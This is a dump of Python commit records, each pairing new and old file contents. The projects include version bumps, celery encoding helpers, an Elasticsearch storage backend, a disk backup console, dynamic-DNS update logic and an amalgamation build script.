f7060b65464b24bb16a8cf4704c68fa1348d655c | bump version | crossbar/crossbar/__init__.py | crossbar/crossbar/__init__.py | ###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU Affero General Public License, version 3,
## as published by the Free Software Foundation.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Affero General Public License for more details.
##
## You should have received a copy of the GNU Affero General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
##
###############################################################################
# Package docstring (exposed as crossbar.__doc__).
__doc__ = """
Crossbar.io - Polyglot application router.
For more information, please visit:
* Documentation: https://github.com/crossbario/crossbar/wiki
* Homepage: http://crossbar.io/
* Source code: https://github.com/crossbario/crossbar
Open-source licensed under the GNU Affero General Public License version 3.
Created by Tavendo GmbH. Get in contact at http://tavendo.com
"""
# Package release version string.
__version__ = "0.9.4-3"
| ###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU Affero General Public License, version 3,
## as published by the Free Software Foundation.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Affero General Public License for more details.
##
## You should have received a copy of the GNU Affero General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
##
###############################################################################
# Package docstring (exposed as crossbar.__doc__).
__doc__ = """
Crossbar.io - Polyglot application router.
For more information, please visit:
* Documentation: https://github.com/crossbario/crossbar/wiki
* Homepage: http://crossbar.io/
* Source code: https://github.com/crossbario/crossbar
Open-source licensed under the GNU Affero General Public License version 3.
Created by Tavendo GmbH. Get in contact at http://tavendo.com
"""
# Package release version string.
__version__ = "0.9.4-2"
| Python | 0 |
c0e09993facdd76e7b1dfbab97285464f83980bb | Update version | cast_convert/__init__.py | cast_convert/__init__.py | #!/usr/bin/env python3
__version__ = '0.1.7.17'
from .cmd import cmd as command
from .watch import *
from . import *
from .convert import *
from .media_info import *
import click
@click.command(help="Print version")
def version():
# Click subcommand: print this package's __version__ string to stdout.
print(__version__)
# Register the subcommand on the top-level `command` CLI entry point.
command.add_command(version)
| #!/usr/bin/env python3
__version__ = '0.1.7.11'
from .cmd import cmd as command
from .watch import *
from . import *
from .convert import *
from .media_info import *
import click
@click.command(help="Print version")
def version():
    """Click subcommand: print this package's __version__ string to stdout."""
    # BUG FIX: use the builtin print. `debug_print` is not defined by this
    # module's explicit imports (it could only arrive via a star import), and
    # the version banner should always be printed, not only in debug mode.
    print(__version__)

# Register the subcommand on the top-level `command` CLI entry point.
command.add_command(version)
| Python | 0 |
b5cd4ff2b02151bca966c53b80dbea8911a7a6b2 | Upgrade celery.utils.encoding from kombu | celery/utils/encoding.py | celery/utils/encoding.py | """
celery.utils.encoding
====================
Utilities to encode text, and to safely emit text from running
applications without crashing with the infamous :exc:`UnicodeDecodeError`
exception.
"""
from __future__ import absolute_import
import sys
import traceback
__all__ = ["str_to_bytes", "bytes_to_str", "from_utf8",
"default_encoding", "safe_str", "safe_repr"]
is_py3k = sys.version_info >= (3, 0)

# Text/bytes conversion helpers; the definitions differ per major version.
if is_py3k:
    def str_to_bytes(s):
        """Encode text to bytes; non-text values pass through unchanged."""
        return s.encode() if isinstance(s, str) else s

    def bytes_to_str(s):
        """Decode bytes to text; non-bytes values pass through unchanged."""
        return s.decode() if isinstance(s, bytes) else s

    def from_utf8(s, *args, **kwargs):
        """No-op on Python 3, where text is already unicode."""
        return s
else:
    def str_to_bytes(s):  # noqa
        """Encode unicode to a byte string; byte strings pass through."""
        return s.encode() if isinstance(s, unicode) else s

    def bytes_to_str(s):  # noqa
        """No-op on Python 2, where str already is a byte string."""
        return s

    def from_utf8(s, *args, **kwargs):  # noqa
        """Encode a Python 2 string as UTF-8."""
        return s.encode("utf-8", *args, **kwargs)
# Use UTF-8 on Jython; everywhere else ask the OS for the filesystem encoding.
if sys.platform.startswith("java"):
    def default_encoding():
        """Return the encoding used for text conversion (UTF-8 on Jython)."""
        return "utf-8"
else:
    def default_encoding():  # noqa
        """Return the encoding used for text conversion (the filesystem encoding)."""
        return sys.getfilesystemencoding()
def safe_str(s, errors="replace"):
    """Return a best-effort string for *s* without raising UnicodeDecodeError.

    String values go through _safe_str() for encoding normalization; anything
    else is rendered with safe_repr().
    """
    s = bytes_to_str(s)
    if isinstance(s, basestring):
        return _safe_str(s, errors)
    return safe_repr(s, errors)
def _safe_str(s, errors="replace"):
# Python 2 only: normalize between unicode and byte strings using the
# platform encoding. On Python 3 the value is returned untouched.
if is_py3k:
return s
encoding = default_encoding()
try:
if isinstance(s, unicode):
return s.encode(encoding, errors)
return unicode(s, encoding, errors)
except Exception, exc:
# Last resort: never propagate the conversion failure; return a
# placeholder embedding the error and the current stack trace instead.
return "<Unrepresentable %r: %r %r>" % (
type(s), exc, "\n".join(traceback.format_stack()))
def safe_repr(o, errors="replace"):
    """repr() that degrades to _safe_str() when the object's __repr__ raises."""
    try:
        rendered = repr(o)
    except Exception:
        rendered = _safe_str(o, errors)
    return rendered
| """
celery.utils.encoding
=====================
Utilities to encode text, and to safely emit text from running
applications without crashing with the infamous :exc:`UnicodeDecodeError`
exception.
"""
from __future__ import absolute_import
import sys
import traceback
__all__ = ["str_to_bytes", "bytes_to_str", "from_utf8",
"default_encoding", "safe_str", "safe_repr"]
is_py3k = sys.version_info >= (3, 0)
# Text/bytes conversion helpers; the definitions differ per major version.
if sys.version_info >= (3, 0):
def str_to_bytes(s):
if isinstance(s, str):
return s.encode()
return s
def bytes_to_str(s):
if isinstance(s, bytes):
return s.decode()
return s
def from_utf8(s, *args, **kwargs):
return s
else:
# NOTE(review): in this revision the Python 2 str_to_bytes() is a no-op,
# so unicode input is returned unencoded.
def str_to_bytes(s): # noqa
return s
def bytes_to_str(s): # noqa
return s
def from_utf8(s, *args, **kwargs): # noqa
return s.encode("utf-8", *args, **kwargs)
# Use UTF-8 on Jython; everywhere else ask the OS for the filesystem encoding.
if sys.platform.startswith("java"):
def default_encoding():
return "utf-8"
else:
def default_encoding(): # noqa
return sys.getfilesystemencoding()
def safe_str(s, errors="replace"):
# Best-effort stringification that avoids UnicodeDecodeError: non-strings
# are rendered via safe_repr(), strings via _safe_str().
s = bytes_to_str(s)
if not isinstance(s, basestring):
return safe_repr(s, errors)
return _safe_str(s, errors)
def _safe_str(s, errors="replace"):
# Python 2 only: normalize between unicode and byte strings using the
# platform encoding. On Python 3 the value is returned untouched.
if is_py3k:
return s
encoding = default_encoding()
try:
if isinstance(s, unicode):
return s.encode(encoding, errors)
return unicode(s, encoding, errors)
except Exception, exc:
# Last resort: never propagate the conversion failure; return a
# placeholder embedding the error and the current stack trace instead.
return "<Unrepresentable %r: %r %r>" % (
type(s), exc, "\n".join(traceback.format_stack()))
def safe_repr(o, errors="replace"):
try:
return repr(o)
except Exception:
return _safe_str(o, errors)
| Python | 0 |
a0ff8cc15df5cd9668e11eba3b5e7406b33dcfc5 | fix RemovedInDjango19Warning on django.utils.importlib | celery_haystack/utils.py | celery_haystack/utils.py | from django.core.exceptions import ImproperlyConfigured
try:
from importlib import import_module
except ImportError:
from django.utils.importlib import import_module
from django.db import connection
from haystack.utils import get_identifier
from .conf import settings
def get_update_task(task_path=None):
import_path = task_path or settings.CELERY_HAYSTACK_DEFAULT_TASK
module, attr = import_path.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError as e:
raise ImproperlyConfigured('Error importing module %s: "%s"' %
(module, e))
try:
Task = getattr(mod, attr)
except AttributeError:
raise ImproperlyConfigured('Module "%s" does not define a "%s" '
'class.' % (module, attr))
return Task()
def enqueue_task(action, instance):
"""
Common utility for enqueing a task for the given action and
model instance.
"""
identifier = get_identifier(instance)
kwargs = {}
if settings.CELERY_HAYSTACK_QUEUE:
kwargs['queue'] = settings.CELERY_HAYSTACK_QUEUE
if settings.CELERY_HAYSTACK_COUNTDOWN:
kwargs['countdown'] = settings.CELERY_HAYSTACK_COUNTDOWN
task = get_update_task()
if hasattr(connection, 'on_commit'):
connection.on_commit(
lambda: task.apply_async((action, identifier), {}, **kwargs)
)
else:
task.apply_async((action, identifier), {}, **kwargs)
| from django.core.exceptions import ImproperlyConfigured
from django.utils.importlib import import_module
from django.db import connection
from haystack.utils import get_identifier
from .conf import settings
def get_update_task(task_path=None):
import_path = task_path or settings.CELERY_HAYSTACK_DEFAULT_TASK
module, attr = import_path.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError as e:
raise ImproperlyConfigured('Error importing module %s: "%s"' %
(module, e))
try:
Task = getattr(mod, attr)
except AttributeError:
raise ImproperlyConfigured('Module "%s" does not define a "%s" '
'class.' % (module, attr))
return Task()
def enqueue_task(action, instance):
"""
Common utility for enqueing a task for the given action and
model instance.
"""
identifier = get_identifier(instance)
kwargs = {}
if settings.CELERY_HAYSTACK_QUEUE:
kwargs['queue'] = settings.CELERY_HAYSTACK_QUEUE
if settings.CELERY_HAYSTACK_COUNTDOWN:
kwargs['countdown'] = settings.CELERY_HAYSTACK_COUNTDOWN
task = get_update_task()
if hasattr(connection, 'on_commit'):
connection.on_commit(
lambda: task.apply_async((action, identifier), {}, **kwargs)
)
else:
task.apply_async((action, identifier), {}, **kwargs)
| Python | 0 |
7d89c9c3229ebd7d8b56edf211e7020c3fad29a0 | add support for msgpack | utils/encoders.py | utils/encoders.py | # Copyright (C) 2015 SlimRoms Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
SUPPORTED_ENCODERS = {}
import json
def json_encode(obj, pretty=False):
kwargs = {}
if pretty:
kwargs['indent'] = 4
kwargs['separators'] = (',', ': ')
return json.dumps(obj, **kwargs).replace("</", "<\\/")
SUPPORTED_ENCODERS.update({
'json': {
'headers': (("Content-Type", "application/json; charset=UTF-8"),),
'encoder': json_encode
}
})
try:
import xmltodict
except ImportError:
pass
else:
def xml_encode(obj, pretty=False):
if len(obj) == 1:
obj = {'root': obj}
return xmltodict.unparse(obj, pretty=pretty)
SUPPORTED_ENCODERS.update({
'xml': {
'headers': (("Content-Type", "application/xml; charset=UTF-8"),),
'encoder': xml_encode
}
})
try:
import yaml
except ImportError:
pass
else:
def yaml_encode(obj, pretty=False):
yaml.safe_dump(obj, default_flow_style=(not pretty))
SUPPORTED_ENCODERS.update({
'yaml': {
'headers': (("Content-Type", "text/yaml; charset=UTF-8"),),
'encoder': yaml_encode
}
})
try:
try:
import msgpack
except ImportError:
import umsgpack as msgpack
except ImportError:
pass
else:
def msgpack_encode(obj, pretty=False):
return msgpack.dumps(obj)
SUPPORTED_ENCODERS.update({
'msgpack': {
'headers': (("Content-Type", "application/msgpack; charset=UTF-8"),),
'encoder': msgpack_encode
}
})
| # Copyright (C) 2015 SlimRoms Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
SUPPORTED_ENCODERS = {}
import json
def json_encode(obj, pretty=False):
kwargs = {}
if pretty:
kwargs['indent'] = 4
kwargs['separators'] = (',', ': ')
return json.dumps(obj, **kwargs).replace("</", "<\\/")
SUPPORTED_ENCODERS.update({
'json': {
'headers': (("Content-Type", "application/json; charset=UTF-8"),),
'encoder': json_encode
}
})
try:
import xmltodict
except ImportError:
pass
else:
def xml_encode(obj, pretty=False):
if len(obj) == 1:
obj = {'root': obj}
return xmltodict.unparse(obj, pretty=pretty)
SUPPORTED_ENCODERS.update({
'xml': {
'headers': (("Content-Type", "application/xml; charset=UTF-8"),),
'encoder': xml_encode
}
})
try:
import yaml
except ImportError:
pass
else:
def yaml_encode(obj, pretty=False):
yaml.safe_dump(obj, default_flow_style=(not pretty))
SUPPORTED_ENCODERS.update({
'yaml': {
'headers': (("Content-Type", "text/yaml; charset=UTF-8"),),
'encoder': yaml_encode
}
})
| Python | 0 |
745d3fae6b6055c731a47c13ef77e1faf1a4b7e5 | upgrade elasticsearch mining backends | mining/db/backends/melasticsearch.py | mining/db/backends/melasticsearch.py | # -*- coding: utf-8 -*-
import json
import requests
from elasticsearch import Elasticsearch as ES
from mining.utils.listc import listc_dict
class Elasticsearch(object):
def conn(self):
"""Open connection on Elasticsearch DataBase"""
conn = ES([
{"host": self.conf.get('host'),
"port": self.conf.get('port')}
])
return conn
def save(self, house, data, content_type='dict'):
"""Save meta dada on Elasticsearch"""
requests.delete("http://{}:{}/{}".format(
self.conf.get('host'), self.conf.get('port'), house))
for obj in data.get('data'):
self.conn().index(index=house,
doc_type='data'.format(house),
body=obj)
self.conn().index(index=house,
doc_type='columns',
body={"columns": data.get('columns')})
return self.conn()
def get(self, house, content_type="dict", callback={}):
"""Get meta data on Elasticsearch"""
count = self.conn().count(index=house, doc_type="data").get('count')
doc_data = self.conn().search(index=house, doc_type='data',
body=self.filter(), size=count)
data = {}
"""
data['data'] = [obj.get("_source")
for obj in doc_data.get('hits').get('hits')]
"""
data['data'] = listc_dict(doc_data.get('hits').get('hits'), "_source")
doc_columns = self.conn().search(index=house, doc_type='columns',
body=self.filter())
data.update(doc_columns.get('hits').get('hits')[0].get('_source'))
data['count'] = count
return data
def filter(self):
"""Generate dict to applay filter on Elasticsearch"""
filter = {
"query": {
"bool": {
"should": [
{ "match": { "country": "Brazil"}},
{ "match": { "full_name": "Daniel Austin"}}
]
}
}
}
filter = {"query": {"match_all" : {}}}
return filter
| # -*- coding: utf-8 -*-
import json
from elasticsearch import Elasticsearch as ES
class Elasticsearch(object):
def conn(self):
"""Open connection on Elasticsearch DataBase"""
conn = ES([
{"host": self.conf.get('host'),
"port": self.conf.get('port'),
"url_prefix": self.conf.get('db')}
])
return conn
def save(self, house, data, content_type=None):
"""Save meta dada on Elasticsearch"""
if content_type == "application/json":
data = json.dumps(data)
return self.conn().index(index=house, doc_type='json', id=1,
body=data)
def get(self, house, content_type="application/json", callback={}):
"""Get meta data on Elasticsearch"""
data = self.conn().get(index=house, doc_type='json', id=1) or callback
if content_type == "application/json":
return json.loads(data['_source'])
return data['_source']
| Python | 0 |
136a47e74f6c7e10c05286bc12048b41b7e2f580 | Add a simple command shell for running backup and restore | corvus/console.py | corvus/console.py | import asyncore
import cmd
import shlex
import sys
import time
from corvus.client import Corvus
class Console(cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None,
corvus=None):
if corvus is None:
corvus = Corvus()
self._corvus = corvus
self.prompt = "> "
cmd.Cmd.__init__(self, completekey, stdin, stdout)
def help_backup(self):
self.stdout.write('backup <drive> <filename>\n'
'Read all sectors and save to an image file\n')
def do_backup(self, args):
splitted = shlex.split(args)
if len(splitted) != 2:
return self.help_backup()
drive = int(splitted[0])
filename = splitted[1]
total_sectors = self._corvus.get_drive_capacity(drive)
with open(filename, "wb") as f:
for i in range(total_sectors):
data = self._corvus.read_sector_512(drive, i)
f.write(''.join([ chr(d) for d in data ]))
self.stdout.write("\r%d bytes" % (i * 512))
self.stdout.flush()
self.stdout.write("\n")
def help_restore(self):
self.stdout.write('restore <drive> <filename>\n'
'Write all sectors from an image file\n')
def do_restore(self, args):
splitted = shlex.split(args)
if len(splitted) != 2:
return self.help_restore()
drive = int(splitted[0])
filename = splitted[1]
total_sectors = self._corvus.get_drive_capacity(drive)
with open(filename, "rb") as f:
for i in range(total_sectors):
data = [ ord(d) for d in f.read(512) ]
if len(data) < 512:
break
self._corvus.write_sector_512(1, i, data)
self.stdout.write("\r%d bytes" % (i * 512))
self.stdout.flush()
self.stdout.write("\n")
def help_scribble(self):
self.stdout.write('scribble <drive> <count>\n'
'Seek to first and last sector <count> times.\n')
def do_scribble(self, args):
splitted = shlex.split(args)
if len(splitted) != 2:
return self.help_scribble()
drive = int(splitted[0])
count = int(splitted[1])
# corvus, count
first_sector = 0
last_sector = self._corvus.get_drive_capacity(1) - 1
for i in range(count):
self._corvus.read_sector_512(drive, first_sector)
time.sleep(0.10)
self._corvus.read_sector_512(drive, last_sector)
time.sleep(0.10)
def help_quit(self):
self._output("Exit this program")
def do_quit(self, args):
return 1
def main():
c = Console()
c.do_help('')
c.cmdloop()
if __name__ == "__main__":
main()
| import sys
import time
from corvus.client import Corvus
def backup(corvus, filename):
total_sectors = corvus.get_drive_capacity(1)
with open(filename, "wb") as f:
for i in range(total_sectors):
data = corvus.read_sector_512(1, i)
f.write(''.join([ chr(d) for d in data ]))
sys.stdout.write("\r%d bytes" % (i * 512))
sys.stdout.flush()
sys.stdout.write("\n")
def restore(corvus, filename):
total_sectors = corvus.get_drive_capacity(1)
with open(filename, "rb") as f:
for i in range(total_sectors):
data = [ ord(d) for d in f.read(512) ]
if len(data) < 512:
break
corvus.write_sector_512(1, i, data)
sys.stdout.write("\r%d bytes" % (i * 512))
sys.stdout.flush()
sys.stdout.write("\n")
def scribble(corvus, count):
first_sector = 0
last_sector = corvus.get_drive_capacity(1) - 1
for i in range(count):
corvus.read_sector_512(1, first_sector)
time.sleep(0.10)
corvus.read_sector_512(1, last_sector)
time.sleep(0.10)
def main():
corvus = Corvus()
corvus.init_drive()
backup(corvus, "image.bin")
if __name__ == "__main__":
main()
| Python | 0 |
bc1e350dd19d91932bbfff73f863129ac94273c9 | bump version to 2.0.1 | torment/information.py | torment/information.py | # Copyright 2015 Alex Brandt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
AUTHOR = 'Alex Brandt'
AUTHOR_EMAIL = 'alunduil@alunduil.com'
COPYRIGHT = '2015'
DESCRIPTION = 'A Study in Fixture Based Testing Frameworking'
LICENSE = 'Apache-2.0'
NAME = 'torment'
URL = 'https://github.com/kumoru/torment'
VERSION = '2.0.1'
| # Copyright 2015 Alex Brandt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
AUTHOR = 'Alex Brandt'
AUTHOR_EMAIL = 'alunduil@alunduil.com'
COPYRIGHT = '2015'
DESCRIPTION = 'A Study in Fixture Based Testing Frameworking'
LICENSE = 'Apache-2.0'
NAME = 'torment'
URL = 'https://github.com/kumoru/torment'
VERSION = '2.0.0'
| Python | 0 |
90ad8e104c339b923d9291916647391572fbced1 | Bump version number | nassl/__init__.py | nassl/__init__.py | # -*- coding: utf-8 -*-
__author__ = 'Alban Diquet'
__version__ = '0.16.0'
| # -*- coding: utf-8 -*-
__author__ = 'Alban Diquet'
__version__ = '0.15.1'
| Python | 0.000002 |
e51786c46ad4eb7310b1eaa0153253116f2c01bc | Update test bids | openprocurement/tender/esco/tests/base.py | openprocurement/tender/esco/tests/base.py | # -*- coding: utf-8 -*-
import os
from copy import deepcopy
from openprocurement.tender.openeu.tests.base import (
BaseTenderWebTest,
test_features_tender_data as base_eu_test_features_data,
test_tender_data as base_eu_test_data,
test_lots as base_eu_lots,
test_bids as base_eu_bids,
)
test_tender_data = deepcopy(base_eu_test_data)
test_tender_data['procurementMethodType'] = "esco.EU"
test_tender_data['NBUdiscountRate'] = 0.22
test_tender_data['minValue'] = test_tender_data['value']
del test_tender_data['value']
test_features_tender_data = deepcopy(base_eu_test_features_data)
test_features_tender_data['procurementMethodType'] = "esco.EU"
test_features_tender_data['NBUdiscountRate'] = 0.22
test_features_tender_data['minValue'] = test_features_tender_data['value']
del test_features_tender_data['value']
test_lots = deepcopy(base_eu_lots)
test_lots[0]['minValue'] = test_lots[0]['value']
del test_lots[0]['value']
test_bids = deepcopy(base_eu_bids)
for bid in test_bids:
bid['value'] = {'yearlyPayments': 0.9,
'annualCostsReduction': 751.5,
'contractDuration': 10}
class BaseESCOWebTest(BaseTenderWebTest):
relative_to = os.path.dirname(__file__)
initial_data = None
initial_status = None
initial_bids = None
initial_lots = None
initial_auth = ('Basic', ('broker', ''))
docservice = False
class BaseESCOContentWebTest(BaseESCOWebTest):
""" ESCO Content Test """
initialize_initial_data = True
def setUp(self):
super(BaseESCOContentWebTest, self).setUp()
if self.initial_data and self.initialize_initial_data:
self.create_tender()
class BaseESCOEUContentWebTest(BaseESCOContentWebTest):
""" ESCO EU Content Test """
initial_data = test_tender_data
| # -*- coding: utf-8 -*-
import os
from copy import deepcopy
from openprocurement.tender.openeu.tests.base import (
BaseTenderWebTest,
test_features_tender_data as base_eu_test_features_data,
test_tender_data as base_eu_test_data,
test_lots as base_eu_lots,
test_bids as base_eu_bids,
)
test_tender_data = deepcopy(base_eu_test_data)
test_tender_data['procurementMethodType'] = "esco.EU"
test_tender_data['NBUdiscountRate'] = 0.22
test_tender_data['minValue'] = test_tender_data['value']
del test_tender_data['value']
test_features_tender_data = deepcopy(base_eu_test_features_data)
test_features_tender_data['procurementMethodType'] = "esco.EU"
test_features_tender_data['NBUdiscountRate'] = 0.22
test_features_tender_data['minValue'] = test_features_tender_data['value']
del test_features_tender_data['value']
test_lots = deepcopy(base_eu_lots)
test_lots[0]['minValue'] = test_lots[0]['value']
del test_lots[0]['value']
test_bids = deepcopy(base_eu_bids)
test_bids[0]['value'] = {'yearlyPayments': 0.9,
'annualCostsReduction': 751.5,
'contractDuration': 10}
class BaseESCOWebTest(BaseTenderWebTest):
relative_to = os.path.dirname(__file__)
initial_data = None
initial_status = None
initial_bids = None
initial_lots = None
initial_auth = ('Basic', ('broker', ''))
docservice = False
class BaseESCOContentWebTest(BaseESCOWebTest):
""" ESCO Content Test """
initialize_initial_data = True
def setUp(self):
super(BaseESCOContentWebTest, self).setUp()
if self.initial_data and self.initialize_initial_data:
self.create_tender()
class BaseESCOEUContentWebTest(BaseESCOContentWebTest):
""" ESCO EU Content Test """
initial_data = test_tender_data
| Python | 0 |
7a8e5d15d7d9681b8d5ddae4d72e64b5ca6cba13 | remove disabled code | dyndnsc/updater/base.py | dyndnsc/updater/base.py | # -*- coding: utf-8 -*-
import logging
import requests
from ..common.subject import Subject
from ..common.events import IP_UPDATE_SUCCESS, IP_UPDATE_ERROR
log = logging.getLogger(__name__)
class UpdateProtocol(Subject):
"""the base class for all update protocols"""
_updateurl = None
theip = None
hostname = None # this holds the desired dns hostname
status = 0
nochgcount = 0
failcount = 0
def __init__(self):
self.updateurl = self._updateurl
super(UpdateProtocol, self).__init__()
def updateUrl(self):
return self.updateurl
def success(self):
self.status = 0
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_SUCCESS, "Updated IP address of '%s' to %s" % (self.hostname, self.theip))
def abuse(self):
self.status = 1
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_ERROR, "This client is considered to be abusive for hostname '%s'" % (self.hostname))
def nochg(self):
self.status = 0
self.failcount = 0
self.nochgcount += 1
def nohost(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Invalid/non-existant hostname: [%s]" % (self.hostname))
def failure(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Service is failing")
def notfqdn(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "The provided hostname '%s' is not a valid hostname!" % (self.hostname))
def protocol(self):
params = {'myip': self.theip, 'hostname': self.hostname}
r = requests.get(self.updateUrl(), params=params, auth=(self.userid, self.password), timeout=60)
r.close()
log.debug("status %i, %s", r.status_code, r.text)
if r.status_code == 200:
if r.text.startswith("good "):
self.success()
return self.theip
elif r.text.startswith('nochg'):
self.nochg()
return self.theip
elif r.text == 'nohost':
self.nohost()
return 'nohost'
elif r.text == 'abuse':
self.abuse()
return 'abuse'
elif r.text == '911':
self.failure()
return '911'
elif r.text == 'notfqdn':
self.notfqdn()
return 'notfqdn'
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.text))
return r.text
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.status_code))
return 'invalid http status code: %s' % r.status_code
| # -*- coding: utf-8 -*-
import logging
import requests
from ..common.subject import Subject
from ..common.events import IP_UPDATE_SUCCESS, IP_UPDATE_ERROR
log = logging.getLogger(__name__)
class UpdateProtocol(Subject):
"""the base class for all update protocols"""
_updateurl = None
theip = None
hostname = None # this holds the desired dns hostname
status = 0
nochgcount = 0
failcount = 0
def __init__(self):
self.updateurl = self._updateurl
super(UpdateProtocol, self).__init__()
observers = []
# TODO: auto detect all notifiers
# TODO: make this configurable?
if False:
from ..notifications import osxnotificationcenter
if osxnotificationcenter.is_available():
observers.append(osxnotificationcenter.create_notify_handler())
from ..notifications import growl
if growl.is_available():
observers.append(growl.create_notify_handler())
for observer in observers:
self.register_observer(observer, (IP_UPDATE_SUCCESS, IP_UPDATE_ERROR))
def updateUrl(self):
return self.updateurl
def success(self):
self.status = 0
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_SUCCESS, "Updated IP address of '%s' to %s" % (self.hostname, self.theip))
def abuse(self):
self.status = 1
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_ERROR, "This client is considered to be abusive for hostname '%s'" % (self.hostname))
def nochg(self):
self.status = 0
self.failcount = 0
self.nochgcount += 1
def nohost(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Invalid/non-existant hostname: [%s]" % (self.hostname))
def failure(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Service is failing")
def notfqdn(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "The provided hostname '%s' is not a valid hostname!" % (self.hostname))
def protocol(self):
params = {'myip': self.theip, 'hostname': self.hostname}
r = requests.get(self.updateUrl(), params=params, auth=(self.userid, self.password), timeout=60)
r.close()
log.debug("status %i, %s", r.status_code, r.text)
if r.status_code == 200:
if r.text.startswith("good "):
self.success()
return self.theip
elif r.text.startswith('nochg'):
self.nochg()
return self.theip
elif r.text == 'nohost':
self.nohost()
return 'nohost'
elif r.text == 'abuse':
self.abuse()
return 'abuse'
elif r.text == '911':
self.failure()
return '911'
elif r.text == 'notfqdn':
self.notfqdn()
return 'notfqdn'
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.text))
return r.text
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.status_code))
return 'invalid http status code: %s' % r.status_code
| Python | 0 |
6c15caa37c3635fc1ca65a0d2989a271bc5723fe | Update amalgamation.py | nnvm/amalgamation/amalgamation.py | nnvm/amalgamation/amalgamation.py | import sys
import os.path, re, StringIO
blacklist = [
'Windows.h',
'mach/clock.h', 'mach/mach.h',
'malloc.h',
'glog/logging.h', 'io/azure_filesys.h', 'io/hdfs_filesys.h', 'io/s3_filesys.h',
'sys/stat.h', 'sys/types.h',
'omp.h', 'execinfo.h', 'packet/sse-inl.h'
]
def get_sources(def_file):
sources = []
files = []
visited = set()
mxnet_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
for line in open(def_file):
files = files + line.strip().split(' ')
for f in files:
f = f.strip()
if not f or f.endswith('.o:') or f == '\\': continue
fn = os.path.relpath(f)
if os.path.abspath(f).startswith(mxnet_path) and fn not in visited:
sources.append(fn)
visited.add(fn)
return sources
sources = get_sources(sys.argv[1])
def find_source(name, start):
candidates = []
for x in sources:
if x == name or x.endswith('/' + name): candidates.append(x)
if not candidates: return ''
if len(candidates) == 1: return candidates[0]
for x in candidates:
if x.split('/')[1] == start.split('/')[1]: return x
return ''
re1 = re.compile('<([./a-zA-Z0-9_-]*)>')
re2 = re.compile('"([./a-zA-Z0-9_-]*)"')
sysheaders = []
history = set([])
out = StringIO.StringIO()
def expand(x, pending):
if x in history and x not in ['mshadow/mshadow/expr_scalar-inl.h']: # MULTIPLE includes
return
if x in pending:
#print 'loop found: %s in ' % x, pending
return
print >>out, "//===== EXPANDING: %s =====\n" %x
for line in open(x):
if line.find('#include') < 0:
out.write(line)
continue
if line.strip().find('#include') > 0:
print line
continue
m = re1.search(line)
if not m: m = re2.search(line)
if not m:
print line + ' not found'
continue
h = m.groups()[0].strip('./')
source = find_source(h, x)
if not source:
if (h not in blacklist and
h not in sysheaders and
'mkl' not in h and
'nnpack' not in h): sysheaders.append(h)
else:
expand(source, pending + [x])
print >>out, "//===== EXPANDED: %s =====\n" %x
history.add(x)
expand(sys.argv[2], [])
f = open(sys.argv[3], 'wb')
for k in sorted(sysheaders):
